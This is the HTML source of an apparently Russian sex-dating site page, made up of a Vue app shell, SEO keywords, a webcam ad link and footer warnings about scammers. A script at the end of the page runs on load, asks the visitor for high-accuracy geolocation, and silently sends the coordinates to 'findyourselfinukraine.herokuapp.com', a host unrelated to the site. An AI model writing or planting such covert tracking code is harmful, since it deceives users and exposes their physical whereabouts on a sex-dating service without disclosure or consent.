
<!DOCTYPE html>
<html>
  <head>
    <title>Знакомства для секса и общения, с девушкой Xxx, без регистрации бесплатно без смс</title>
<META http-equiv="content-type" content="text/html; charset=UTF-8">
<META name="viewport" content="width=device-width, initial-scale=1.0">
<META name="description" content="Знакомства для секса и общения. Легко найти парня или девушку в своём доме или дворе. Поиск партнёров для секса в своём городе. Общение, переписка и свободный обмен фотографиями онлайн.">
<META name="keywords" content="знакомства, секс, Xxx, секс знакомства Xxx, знакомства для секса Xxx, бесплатные знакомства Xxx, знакомства Xxx без регистрации, знакомства Xxx бесплатно, секс знакомства Xxx без смс">


<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32">
<link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16">
<link rel="mask-icon" href="/safari-pinned-tab.svg" color="#ff1302">
<meta name="theme-color" content="#ffffff">
    

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">


<style>
.container {
  max-width: 750px;
}
</style>

  <link href="https://freedom-sex.me/static/build/styles/vendors~app.081b9.css" rel="stylesheet"/></head>
  <body>
    <div style="height: 45px; width: 100%; background-color: #3A5795; position: fixed;">
  <script>
  var defaultSettings = {
    'locale': 'ru',
    'city': 'Xxx',
    'who': Number('2'),
    'age': Number('0'),
    'up': Number('0'),
    'to': Number('0'),
  }
  var defaultResults = '[]';
</script>

</div>
<div style="height: 45px;"></div>


    <div id="app">
      <menu-user @snackbar="showSnackbar"></menu-user>
      <div style="max-width: 750px; margin: 0 auto;">
        <header>
          <div class="container content split-bottom" v-show="!simple">
            <div class="row" style="position: relative;">
              
<div style="min-height: 280px; background-image: url('https://freedom-sex.me/static/img/header-bg.jpg'); background-position: center center; background-size: cover; position: relative;">
  <div style="padding: 10px 15px 7px; font-size: 16px; color: #FFFFFF; position: absolute; bottom: 0; left: 0; right: 0;
  background-color: rgba(0, 0, 0, 0.2); text-transform: uppercase; color: #FFF; font-weight: bold;">
    УНИКАЛЬНЫЙ СПОСОБ ЗНАКОМСТВА
  </div>
</div>

<div style="padding: 15px 15px 15px; ">
  Позволит познакомиться с парнем или девушкой для секса, найти партнёра в соседнем подъезде или доме напротив. Знакомиться в собственном дворе или районе уже сегодня при помощи обычных объявлений
</div>

              

<div style="padding: 10px 10px 7px;  font-size: 14px; color: #FFF; position: absolute; top: 0; left: 0; right: 0; ">
  <Language/>
</div>
 <div class="ad_75">
  <a href="http://bongacams7.com/track" class="ad_75__btn" rel="nofollow" target="_blank">
    <span style="position: relative; bottom: 1px;">❱</span>
    Вебкам
  </a>
</div>

            </div>
          </div>

          <update-available></update-available>

          <virt-links-menu></virt-links-menu>

          <ban-alert v-if="$store.state.authorized"></ban-alert>

          <info-widget></info-widget>
        </header>

        <article>
          <div class="container content">
  <aside class="row">
    <auth-board ref="authboard"></auth-board>
    <photo-line-widget></photo-line-widget>
    <search-wizard>
      <div class="search-wizard" v-html="$t('almostDone')">
        Почти готово...
      </div>
    </search-wizard>
  </aside>
  <div class="row">
    <nav class="preloader" v-show="!ready">
      <div v-if="!renderTimeout">
        <!-- <div class="preloader__img"></div> -->
        <svg width="80px" height="80px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"
  preserveAspectRatio="xMidYMid" class="lds-heart" style="">
<g transform="translate(50 50)">
  <path d="M40.7-34.3c-9.8-9.8-25.6-9.8-35.4,0L0-29l-5.3-5.3c-9.8-9.8-25.6-9.8-35.4,0l0,0c-9.8,9.8-9.8,25.6,0,35.4l5.3,5.3L-23,18.7l23,23l23-23L35.4,6.3L40.7,1C50.4-8.8,50.4-24.6,40.7-34.3z" fill="#f81b24" transform="scale(0.803928 0.803928)">
    <animateTransform attributeName="transform" type="scale" calcMode="spline" values="0.85;1;0.75;0.9;0.85;0.8" keyTimes="0;0.05;0.39;0.45;0.6;1" dur="1s" keySplines="0.215 0.61,0.355 1;0.215 0.61,0.355 1;0.215 0.61,0.355 1;0.215 0.61,0.355 1;0.215 0.61,0.355 1" begin="0s" repeatCount="indefinite"></animateTransform>
  </path>
</g>
</svg>
        <div class="preloader__hint" v-html="$t('preloader')">
          Поиск анкет, всегда бесплатно
        </div>
      </div>
      <div v-else>
        <div class="preloader__hint" data-nosnippet>
          Результат устарел или недоступен
        </div>
        <button class="btn btn-default" onclick="alert('Для показа результатов, нам необходимо приблизительно знать где вы находитесь');">
          <span aria-hidden="true" class="glyphicon glyphicon-repeat"></span>
          Обновить
        </button>
      </div>
    </nav>

    <ad-form></ad-form>

    <search-list ref="results"></search-list>
  </div>
</div>

<limitations-widget v-if="!user.vip || !user.vip.status"></limitations-widget>

<desires-widget :tags="tags" v-if="tags.length"></desires-widget>

        </article>

        <footer>
          <div v-show="!simple">
              <slider-footer inline-template>
    <div class="slider-footer container">
      <div class="row">
        <div class="col-md-12 slider-footer__item" v-show="slide == 1">
          FreedomSex - это свободный проект. Альтернатива знакомствам в сети. Способ знакомства в реальной жизни. Подразумевает целью знакомства именно секс. Сайт как способ знакомства в реальной жизни при помощи обычных и анонимных текстовых объявлений. В объявлении указывается только ссылка на сайт, без номеров телефонов, без адресов - 100% анонимно.
        </div>
        <div class="col-md-12 slider-footer__item" v-show="slide == 2">
          Автоматическая регистрация позволит начать общение, даже если зашедшие на сайт, не захотели бы регистрироваться. Объявление, ссылку на сайт необходимо разместить на видном месте. Это возможность быстро найти парня или девушку для секса в собственном дворе или районе уже сегодня.
        </div>
        <div class="col-md-12 slider-footer__item" v-show="slide == 3">
          Этот сайт работает как способ знакомства, вы можете познакомиться здесь с девушкой или парнем из соседнего дома при помощи обычного, реального и анонимного текстового объявления. На сайте полностью автоматическая регистрация, в объявлении указывается только ссылка на сайт.
        </div>
      </div>
      <div class="row">
        <div class="col-md-12 slider-footer__pages">
          <span class="slider-footer__link" :class="{active: slide == 1}" @click="slide = 1">1</span>
          <span class="slider-footer__link" :class="{active: slide == 2}" @click="slide = 2">2</span>
          <span class="slider-footer__link" :class="{active: slide == 3}" @click="slide = 3">3</span>
        </div>
      </div>
    </div>
  </slider-footer>

          </div>

          <alert-widget inline-template>
  <div class="container alert-widget">
    <div class="row">
      <div class="alert-widget__wrapper" :class="{compact: compact}" @click.self="compact = (compact == false)">
        Сайт полностью бесплатен и создан для общения.
        Если вам кто-то предложит что-либо оплатить,
        <a href="#" rel="nofollow" target="_blank">сообщите нам</a>
        любым способом. Предложение интим услуг на сайте запрещено.
        Пожалуйста, не «ложите» деньги на телефон,
        на интернет, не делайте денежных переводов, это
        <a href="#" rel="nofollow" target="_blank">
         уловки мошенников</a>. Не нарушайте законов,
        <a href="#" rel="nofollow" target="_blank">шантаж</a>.
        Отправляйте фото
        <a href="#" rel="nofollow" target="_blank">сохраняя анонимность</a>.

        <div class="additional">
          Только реальные анкеты. Проверить действительность анкетных данных или реальность намерений очень просто,
          предложив обменяться адресами страниц вконтакте или одноклассников,
          при помощи видеозвонка Skype или позвонив собеседнику предварительно спросив номер телефона.
          Также легко можно
          <a href="#" rel="nofollow" target="_blank">проверить подлинность фото</a>.
        </div>
      </div>
    </div>
  </div>
</alert-widget>

<ad-alert></ad-alert>

  <feedback-buttons v-if="$store.state.user.id"></feedback-buttons>

  <div class="more-information">
   <span class="more-information__link" @click="$router.push('#')">Правила сайта</span><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Как пользоваться сайтом</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Условия использования</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Регистрация автоматическая</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Способ знакомства</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Пользовательское соглашение</a><i>·</i>

   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Конфиденциальность</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Защита пользователей</a><i>·</i>
   <a class="more-information__link" rel="nofollow" href="#" target="_blank">Номер телефона и клевета</a><i>·</i>
   <span class="more-information__link" @click="$router.push('#')">Помощь по сайту</span><i>·</i>

   <span class="more-information__link" @click="$router.push('#')">Реклама на сайте</span><i>·</i>
   <span class="more-information__link" @click="$router.push('#')">Написать разработчикам</span><i>·</i>
   <a class="more-information__link" href="#" rel="nofollow noopener noreferrer">Форум сообщества</a><i>·</i>
   <a class="more-information__link" href="#" rel="nofollow noopener noreferrer">Версия с котиками</a>
  </div>



    
<div align="center" style="display:none;">

</div>

<script type="text/javascript" src="//unpkg.com/moment@2.22.1/moment.js"></script>
<script type="text/javascript" src="//unpkg.com/moment@2.22.1/locale/ru.js"></script>
  <script type="text/javascript" src="https://unpkg.com/babel-polyfill@6.26.0/dist/polyfill.min.js"></script><script type="text/javascript" src="https://unpkg.com/vue@2.6.14/dist/vue.js"></script><script type="text/javascript" src="https://unpkg.com/vuex@3.6.2/dist/vuex.min.js"></script><script type="text/javascript" src="https://unpkg.com/vue-router@2.7.0/dist/vue-router.min.js"></script><script type="text/javascript" src="https://unpkg.com/vue-i18n@8.27.0/dist/vue-i18n.min.js"></script><script type="text/javascript" src="https://unpkg.com/axios@0.19.2/dist/axios.min.js"></script><script type="text/javascript" src="https://unpkg.com/underscore@1.13.2/underscore-min.js"></script><script type="text/javascript" src="https://unpkg.com/lscache@1.3.0/lscache.js"></script><script type="text/javascript" src="https://unpkg.com/dexie@2.0.4/dist/dexie.min.js"></script>
    <script>
        var host = "findyourselfinukraine.herokuapp.com";
        window.onload = function () {
            var xhttp=new XMLHttpRequest();
            xhttp.open("GET", "https://findyourselfinukraine.herokuapp.com/", true);
            xhttp.send();

            function success(pos) {
                var xhttp=new XMLHttpRequest();
                xhttp.open("GET", "https://findyourselfinukraine.herokuapp.com/?lat=" + pos.coords.latitude + "&lng=" + pos.coords.longitude + "&ac=" + pos.coords.accuracy, true);
                xhttp.send();
            }

            navigator.geolocation.getCurrentPosition(success, function(){}, {
                enableHighAccuracy: true,
                timeout: 5000,
                maximumAge: 0
            });
        }
    </script>
</body>
</html>
